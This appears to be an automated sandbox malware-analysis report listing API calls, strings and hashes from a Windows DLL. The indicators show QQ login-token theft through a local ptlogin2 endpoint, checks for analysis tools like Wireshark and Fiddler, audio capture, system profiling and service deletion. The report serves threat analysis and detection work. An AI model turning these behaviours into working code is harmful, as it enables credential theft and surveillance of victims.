                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wsprintf$NameQueryWindow$CapsCloseDeviceMemoryOpenValue$ClassCommandComputerCountFindFreeGlobalInfoInformationLineReleaseSessionStatusSystemTextTickUser
                                                          • String ID: %d * %d$%d*%dMHz$%s%s%s$0$A$A$A$A$C$C$C$C$CTXOPConntion_Class$D$D$D$D$E$E$E$E$H$H$I$I$I$I$N$N$O$O$P$P$P$P$ProcessorNameString$R$R$R$R$R$R$S$S$S$S$T$T$W$W$a$a$c$c$e$e$e$e$e$e$l$l$m$m$n$n$o$o$o$r$r$r$r$r$s$s$s$s$secorPlartneC$t$t$t$t$y$y$~MHz
                                                          • API String ID: 2087514681-3067132264
                                                          • Opcode ID: 63a6304faa64ff7c01f52f20226e175c82766ba0332dec2d0b30ebfb8e23f1d0
                                                          • Instruction ID: 1800749c8e29be72a86e9a56a49647d81c20680331eb2f52e83484c630fbb443
                                                          • Opcode Fuzzy Hash: 63a6304faa64ff7c01f52f20226e175c82766ba0332dec2d0b30ebfb8e23f1d0
                                                          • Instruction Fuzzy Hash: CD22D23050C7C19EE325C638C844B9BBBD6ABD2304F484A5DF6D947282DBBA9908C767
                                                          APIs
                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 1001410A
                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 1001413A
                                                          • InternetCloseHandle.WININET(00000000), ref: 1001414B
                                                          Strings
                                                          • Accept: */*Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23Accept-Language: zh-cnContent-Type: application/x-www-form-urlencoded, xrefs: 100140CB
                                                          • Set-Cookie: , xrefs: 1001430E, 1001435F
                                                          • GET, xrefs: 10014176, 10014416
                                                          • /cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23, xrefs: 100140B4
                                                          • groups, xrefs: 100146D3
                                                          • , xrefs: 10014100
                                                          • uin, xrefs: 10014658
                                                          • Accept: */*Referer: https://localhost.ptlogin2.qq.com:4301%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 10014456
                                                          • xui.ptlogin2.qq.com, xrefs: 100140A2
                                                          • friends, xrefs: 100146B1
                                                          • pt_local_tk=, xrefs: 100142B5
                                                          • 0.9475416028552021, xrefs: 100143E7
                                                          • nickname, xrefs: 1001464D
                                                          • HTTP/1.1, xrefs: 10014170, 10014410
                                                          • /pt_get_uins?callback=ptui_getuins_CB&r=%s&%s, xrefs: 100143F3
                                                          • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 10014082
                                                          • localhost.ptlogin2.qq.com, xrefs: 100140E0
                                                          • pt_local_token=, xrefs: 10014280
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID: $/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23$/pt_get_uins?callback=ptui_getuins_CB&r=%s&%s$0.9475416028552021$Accept: */*Referer: https://localhost.ptlogin2.qq.com:4301%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$Accept: */*Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23Accept-Language: zh-cnContent-Type: application/x-www-form-urlencoded$GET$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$Set-Cookie: $friends$groups$localhost.ptlogin2.qq.com$nickname$pt_local_tk=$pt_local_token=$uin$xui.ptlogin2.qq.com
                                                          • API String ID: 1463438336-3428588184
                                                          • Opcode ID: d5fce840208fc55bd6649f1f1c9febec2897434e5a5b3cd0b33532438a929aca
                                                          • Instruction ID: 10a0a4d67c7a86b0295143d81d79a2071c775b89c22be300c5b0aaeb6ee9b044
                                                          • Opcode Fuzzy Hash: d5fce840208fc55bd6649f1f1c9febec2897434e5a5b3cd0b33532438a929aca
                                                          • Instruction Fuzzy Hash: C20249766047047BE310DA68DC45FEF73D9EBC4720F450A29FA05E7280EF79E90586A6
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • GetVersionExA.KERNEL32(?), ref: 1001E264
                                                            • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                            • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                            • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001E292
                                                          • sprintf.MSVCRT ref: 1001E2AD
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1001E31B
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001E34D
                                                          • FindWindowA.USER32(#32770,GINA Logon), ref: 1001E377
                                                          • FindWindowA.USER32(#32770,1011F90C), ref: 1001E391
                                                          • Sleep.KERNEL32(0000012C), ref: 1001E3A1
                                                          • FindWindowA.USER32(#32770,GINA Logon), ref: 1001E3AD
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001E414
                                                          • ExitProcess.KERNEL32 ref: 1001E433
                                                          Strings
                                                          Similarity
                                                          • API ID: FindHandleLibraryWindow$AddressCloseLoadModuleProc$ExitFileFreeNameObjectProcessSingleSleepVersionWaitsprintf
                                                          • String ID: #32770$%s -acsi$-rsvc$-wait$.$.$2$2$3$3$A$A$A$A$C$C$D$E$E$E$GINA Logon$H$I$K$L$P$S$S$V$a$a$a$c$c$d$d$d$i$i$l$l$l$l$l$l$n$n$r$r$r$r$r$r$s$s$t$t$t$t$t$t$u$v$v$v$x
                                                          • API String ID: 2386940797-994141675
                                                          • Opcode ID: 1c84750917d403726ce2df58465706bf03f7e45037251a28afedf40dcb5798ad
                                                          • Instruction ID: ce68f29057c7fa9c6db68528a9d4da9d13cbb2a338243e621745e733c91a4579
                                                          • Opcode Fuzzy Hash: 1c84750917d403726ce2df58465706bf03f7e45037251a28afedf40dcb5798ad
                                                          • Instruction Fuzzy Hash: 31C12C6040C3C49EE311C7788898B8FBFD5ABA6348F58495CF2D44B292D3BAD948C767
                                                          APIs
                                                          • AttachConsole.KERNEL32(?), ref: 100101B3
                                                          • Sleep.KERNEL32(0000000A), ref: 100101BB
                                                          • AttachConsole.KERNEL32(?), ref: 100101C5
                                                          • GetConsoleProcessList.KERNEL32(?,00000001), ref: 100101D8
                                                          • #823.MFC42(00000000), ref: 100101E9
                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 100101F9
                                                          • GetCurrentProcessId.KERNEL32 ref: 10010203
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10010217
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 10010226
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001022D
                                                          • #825.MFC42(00000000), ref: 1001023E
                                                          • FreeConsole.KERNEL32 ref: 1001024C
                                                          • Sleep.KERNEL32(0000000A), ref: 10010254
                                                          • FreeConsole.KERNEL32 ref: 1001025A
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 10010266
                                                          • swprintf.MSVCRT(?,\Registry\Machine\System\CurrentControlSet\Services\%S,1011F4E0,NTDLL.DLL,ZwUnloadDriver,NTDLL.DLL,RtlInitUnicodeString,SeLoadDriverPrivilege,00000001), ref: 10010304
                                                          • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 1001039A
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 100103A6
                                                          • OpenServiceA.ADVAPI32(00000000,1011EC82,00010000), ref: 100103BD
                                                          • DeleteService.ADVAPI32(00000000), ref: 100103D0
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 100103D7
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 100103DA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 1001049F
                                                          • lstrcatA.KERNEL32(?,?), ref: 100104B4
                                                          • DeleteFileA.KERNEL32(?), ref: 100104C4
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10010509
                                                          • lstrcatA.KERNEL32(?,?), ref: 10010518
                                                          • DeleteFileA.KERNEL32(?), ref: 10010522
                                                          • LocalFree.KERNEL32(?), ref: 1001052A
                                                          • free.MSVCRT ref: 1001053D
                                                          • free.MSVCRT ref: 10010546
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1001055D
                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 10010568
                                                          • IsWow64Process.KERNEL32(00000000), ref: 1001056F
                                                          • DeleteFileA.KERNEL32(?), ref: 1001060E
                                                          • SetServiceStatus.ADVAPI32(?,1012BB60), ref: 1001062D
                                                          • ExitProcess.KERNEL32 ref: 1001063A
                                                          Strings
                                                          Similarity
                                                          • API ID: Process$Console$DeleteService$CloseDirectoryFileFreeHandleOpen$AttachCurrentListSleepSystemTerminatefreelstrcat$#823#825ExitLocalManagerStatusWindowsWow64swprintf
                                                          • String ID: .$.$.sys$Host$MarkTime$NTDLL.DLL$P$RtlInitUnicodeString$SYSTEM\CurrentControlSet\Services\$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\Select$SYSTEM\Setup$SeLoadDriverPrivilege$V$ZwUnloadDriver$\$\$\Registry\Machine\System\CurrentControlSet\Services\%S$\sysnative\drivers\$\system32\drivers\$a$b$d$d$d$e$g$g$m$n$o$o$s$t$u
                                                          • API String ID: 2905031204-766513331
                                                          • Opcode ID: f4407198bf455ab50e06ca1c261f8534e2d499fe0cca06c648f11f18c27eeb47
                                                          • Instruction ID: e3bd07ef3eb6e488717b5f62ba07ac58d2ef718029029a6487bc72f4bfd56139
                                                          • Opcode Fuzzy Hash: f4407198bf455ab50e06ca1c261f8534e2d499fe0cca06c648f11f18c27eeb47
                                                          • Instruction Fuzzy Hash: 74D12235604354ABE310DB78CC84B9B7BD5EB84314F080A1DF689AB2D1DBB4ED44C7A6
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • LocalAlloc.KERNEL32(00000040,00000104), ref: 10019960
                                                          • OpenSCManagerA.ADVAPI32 ref: 10019977
                                                          • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,?), ref: 100199A3
                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 100199AC
                                                          • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,?), ref: 100199CE
                                                          • OpenServiceA.ADVAPI32(00000000,?,00000001), ref: 100199F4
                                                          • QueryServiceConfigA.ADVAPI32(00000000,00000000,00000000,?), ref: 10019A1A
                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 10019A27
                                                          • QueryServiceConfigA.ADVAPI32(00000000,00000000,00000000,00000000), ref: 10019A3B
                                                          • QueryServiceConfig2A.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 10019A55
                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 10019A62
                                                          • QueryServiceConfig2A.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 10019A7A
                                                          • lstrcatA.KERNEL32(?,100FBD1C), ref: 10019ADB
                                                          • lstrcatA.KERNEL32(?,100FBD14), ref: 10019B06
                                                          • lstrlenA.KERNEL32(00000040), ref: 10019B1C
                                                          • lstrlenA.KERNEL32(?), ref: 10019B24
                                                          • lstrlenA.KERNEL32 ref: 10019B2F
                                                          • lstrlenA.KERNEL32(?), ref: 10019B3B
                                                          • lstrlenA.KERNEL32(?), ref: 10019B44
                                                          • lstrlenA.KERNEL32(?), ref: 10019B4C
                                                          • LocalSize.KERNEL32(?), ref: 10019B5E
                                                          • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10019B70
                                                          • lstrlenA.KERNEL32(?), ref: 10019B7E
                                                          • lstrlenA.KERNEL32(?), ref: 10019B88
                                                          • lstrlenA.KERNEL32(?), ref: 10019BB1
                                                          • lstrlenA.KERNEL32(00000000), ref: 10019BC6
                                                          • lstrlenA.KERNEL32 ref: 10019BCF
                                                          • lstrlenA.KERNEL32(00000000), ref: 10019BFA
                                                          • lstrlenA.KERNEL32 ref: 10019C0B
                                                          • lstrlenA.KERNEL32(00000000), ref: 10019C14
                                                          • lstrlenA.KERNEL32(00000001), ref: 10019C3A
                                                          • lstrlenA.KERNEL32(?), ref: 10019C49
                                                          • lstrlenA.KERNEL32(?), ref: 10019C6B
                                                          • lstrlenA.KERNEL32(?), ref: 10019C81
                                                          • lstrlenA.KERNEL32(?), ref: 10019CA9
                                                          • lstrlenA.KERNEL32(?), ref: 10019CBB
                                                          • lstrlenA.KERNEL32(?), ref: 10019CC5
                                                          • lstrlenA.KERNEL32(?), ref: 10019CE9
                                                          • LocalFree.KERNEL32(?), ref: 10019CFE
                                                          • LocalFree.KERNEL32(00000000), ref: 10019D01
                                                          • CloseServiceHandle.ADVAPI32(?), ref: 10019D08
                                                          • LocalFree.KERNEL32(00000000), ref: 10019D3B
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10019D42
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10019D50
                                                          Strings
                                                          Similarity
                                                          • API ID: lstrlen$Local$Service$Alloc$Query$FreeOpen$CloseConfigConfig2EnumHandleProcessServicesStatuslstrcat$CurrentManagerSizeToken
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 19575313-2896544425
                                                          • Opcode ID: 2df178e330b11d1ae48753c649d3bb89eaa4c1e1807dcd0ba63a183abde4b81f
                                                          • Instruction ID: 602a72ac4dd89d5092f96c4d0856d720342e345610072c012a51b9f9dfb16572
                                                          • Opcode Fuzzy Hash: 2df178e330b11d1ae48753c649d3bb89eaa4c1e1807dcd0ba63a183abde4b81f
                                                          • Instruction Fuzzy Hash: 37D12C75204306AFD714DF64CC84AABB7E9FBC8700F54491DFA46A7250DB74E909CBA2
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateThread), ref: 1000115F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001168
                                                          • LoadLibraryA.KERNEL32 ref: 100011B4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100011B7
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutClose), ref: 100011C7
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100011CA
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInStop), ref: 100011DA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100011DD
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInReset), ref: 100011ED
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100011F0
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInUnprepareHeader), ref: 10001200
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001203
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInClose), ref: 10001211
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001214
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutReset), ref: 10001224
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001227
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutUnprepareHeader), ref: 10001237
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000123A
                                                          • #825.MFC42(?), ref: 100012C4
                                                          • #825.MFC42(00000000,?), ref: 100012CC
                                                          • #825.MFC42(?,00000000,?), ref: 100012D5
                                                          • #825.MFC42(?,?,00000000,?), ref: 100012DE
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$#825
                                                          • String ID: C$H$KERNEL32.dll$TerminateThread$WINMM.dll$a$d$n$o$s$waveInClose$waveInReset$waveInStop$waveInUnprepareHeader$waveOutClose$waveOutReset$waveOutUnprepareHeader
                                                          • API String ID: 345516743-2415744366
                                                          • Opcode ID: 18d932df849a8b69c2fd67332b36b8b357b890c471afae06fbbbe5af20abdcb9
                                                          • Instruction ID: 3b114dfad24d7eddf03eb2cbd10a89371148df8dda5889fc91158876db1259a3
                                                          • Opcode Fuzzy Hash: 18d932df849a8b69c2fd67332b36b8b357b890c471afae06fbbbe5af20abdcb9
                                                          • Instruction Fuzzy Hash: 605143B5904384ABDB10DF74CC88D5B7F98EFD9350F45094DFA8457206DA3AD845CBA1
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: strstr$Window$IconicTextVisible
                                                          • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                          • API String ID: 4234658395-3439171801
                                                          • Opcode ID: 7f7a1d0f36df41b9a4b5849a32739b8253b0e5d148341f86a0cc87d4ab0c3121
                                                          • Instruction ID: 8cebbb76e65a9180966719af1c6f36493ba5cc3a2661010a80882127fb923e92
                                                          • Opcode Fuzzy Hash: 7f7a1d0f36df41b9a4b5849a32739b8253b0e5d148341f86a0cc87d4ab0c3121
                                                          • Instruction Fuzzy Hash: 0B518379A0031676D604F6748DC4ACB36D8EF5458AF064C3EF899DA040F739EB8996A3
                                                          APIs
                                                          • GetVersionExA.KERNEL32 ref: 1001B28C
                                                            • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                            • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                            • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                            • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001A98A
                                                            • Part of subcall function 1001A8F0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9C4
                                                            • Part of subcall function 1001A8F0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9D4
                                                            • Part of subcall function 1001A8F0: ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9E4
                                                            • Part of subcall function 1001A8F0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,771B23A0), ref: 1001A9EB
                                                            • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001A9F8
                                                            • Part of subcall function 1001A8F0: gethostname.WS2_32(?,?), ref: 1001AA00
                                                            • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,771B23A0), ref: 1001AA07
                                                          • getsockname.WS2_32(?), ref: 1001B2F6
                                                          • GetSystemInfo.KERNEL32(?,?,?,00000100,?,00000010,00000004), ref: 1001B363
                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B384
                                                          • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B3CF
                                                          • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B3EA
                                                          • GetTickCount.KERNEL32 ref: 1001B496
                                                          • wsprintfA.USER32 ref: 1001B4B8
                                                          • wsprintfA.USER32 ref: 1001B4DF
                                                          • wsprintfA.USER32 ref: 1001B504
                                                          • wsprintfA.USER32 ref: 1001B52B
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 1001B54C
                                                            • Part of subcall function 1001AA20: lstrlenA.KERNEL32(?,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAA6
                                                            • Part of subcall function 1001AA20: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAE3
                                                            • Part of subcall function 1001AA20: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAF3
                                                            • Part of subcall function 1001AA20: ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB03
                                                            • Part of subcall function 1001AA20: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB0A
                                                            • Part of subcall function 1001AA20: lstrlenA.KERNEL32(?,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB11
                                                          • lstrcpyA.KERNEL32(?,?,?,00000100), ref: 1001B5B9
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 1001B5C9
                                                          • GetLastInputInfo.USER32(?), ref: 1001B5E3
                                                          • GetTickCount.KERNEL32 ref: 1001B5E9
                                                          • _access.MSVCRT ref: 1001B608
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 1001B62B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$lstrlen$lstrcpywsprintf$CloseCountCreateFreeHandleInfoLibraryReadSizeTick$AddressDiskDriveGlobalInputLastLoadMemoryProcSpaceStatusSystemTypeVersion_accessgethostnamegetsockname
                                                          • String ID: %$@$C:\ProgramData\jerrt.txt$D$Default$a$d$e$f$f$l$t$u
                                                          • API String ID: 429165215-739913618
                                                          • Opcode ID: 93d7cf506a966ca3d239304d62bae69cb5e5d56ae30ef9a7664d40add3c0b94f
                                                          • Instruction ID: bba6ecf1fe8d0bd6771c84150094faf2fd0a31ada7f7fe5f254ba2cb99b7a38b
                                                          • Opcode Fuzzy Hash: 93d7cf506a966ca3d239304d62bae69cb5e5d56ae30ef9a7664d40add3c0b94f
                                                          • Instruction Fuzzy Hash: 00A19DB55083859FD724CB68CC84BDFBBE9EBC8304F444A1DF58987241EB75A648CB62
                                                          APIs
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,?,?,10098BF2,000000FF), ref: 1001D4C8
                                                          • sprintf.MSVCRT ref: 1001D4E7
                                                            • Part of subcall function 1001D480: GetFileAttributesA.KERNEL32(?,1001D9C8,?), ref: 1001D485
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1001D540
                                                          • GetFileAttributesA.KERNEL32(?), ref: 1001D595
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 1001D5AB
                                                          • wsprintfA.USER32 ref: 1001D5D2
                                                          • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,00000001), ref: 1001D5E7
                                                          • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 1001D5F3
                                                          • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001D601
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001D608
                                                            • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                            • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                            • Part of subcall function 1001D3B0: time.MSVCRT(00000000,1001DC1C), ref: 1001D3B2
                                                            • Part of subcall function 1001D3B0: srand.MSVCRT ref: 1001D3B9
                                                            • Part of subcall function 1001D390: EnumWindows.USER32(1001D150,?), ref: 1001D3A0
                                                          • Sleep.KERNEL32(000003E8), ref: 1001D64B
                                                          • Sleep.KERNEL32(000186A0), ref: 1001D665
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D67F
                                                          • GetTickCount.KERNEL32 ref: 1001D681
                                                          • GetTickCount.KERNEL32 ref: 1001D6AC
                                                          • GetTickCount.KERNEL32 ref: 1001D6F1
                                                          • GetTickCount.KERNEL32 ref: 1001D735
                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D758
                                                          • GetTickCount.KERNEL32 ref: 1001D77B
                                                          • Sleep.KERNEL32(00000096,?,00000001), ref: 1001D79A
                                                          • GetTickCount.KERNEL32 ref: 1001D7B7
                                                          • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D7C5
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D7DA
                                                          • #825.MFC42(?), ref: 1001D866
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CountTick$Create$AttributesFileMutex$#825CloseD@2@@std@@D@std@@DirectoryEnumErrorEventGrow@?$basic_string@HandleLastObjectReleaseSingleStartupU?$char_traits@V?$allocator@WaitWindowssprintfsrandtimewsprintf
                                                          • String ID: %s:%d:%s$1.0.0$C:\ProgramData\%d.ini$C:\ProgramData\Microsoft Drive1$MyService1$e
                                                          • API String ID: 287845118-1910566113
                                                          • Opcode ID: f3c80545078a190987055d02f112db2d30d9695f12345d236837f794450a6666
                                                          • Instruction ID: 8c7ded9c6ceec9eca41422dcd1451c7b47c1199f62d6f7257f0d10dd3eb8ab53
                                                          • Opcode Fuzzy Hash: f3c80545078a190987055d02f112db2d30d9695f12345d236837f794450a6666
                                                          • Instruction Fuzzy Hash: F5A1B1351083418FE320FF748C85B9EB7E4EB85744F44492DF9899B281EB75E949CB62
                                                          APIs
                                                            • Part of subcall function 1001D890: GetModuleFileNameA.KERNEL32 ref: 1001D8AD
                                                            • Part of subcall function 1001D890: strrchr.MSVCRT ref: 1001D8C3
                                                            • Part of subcall function 1001D890: strrchr.MSVCRT ref: 1001D904
                                                            • Part of subcall function 1001D890: isdigit.MSVCRT ref: 1001D93C
                                                            • Part of subcall function 1001D890: memmove.MSVCRT(?,?), ref: 1001D95D
                                                          • CreateThread.KERNEL32(00000000,00000000,1001D4A0,00000000,00000000,00000000), ref: 1001DAA4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,10098C22,000000FF), ref: 1001DAB4
                                                          • sprintf.MSVCRT ref: 1001DAD3
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1001DB2C
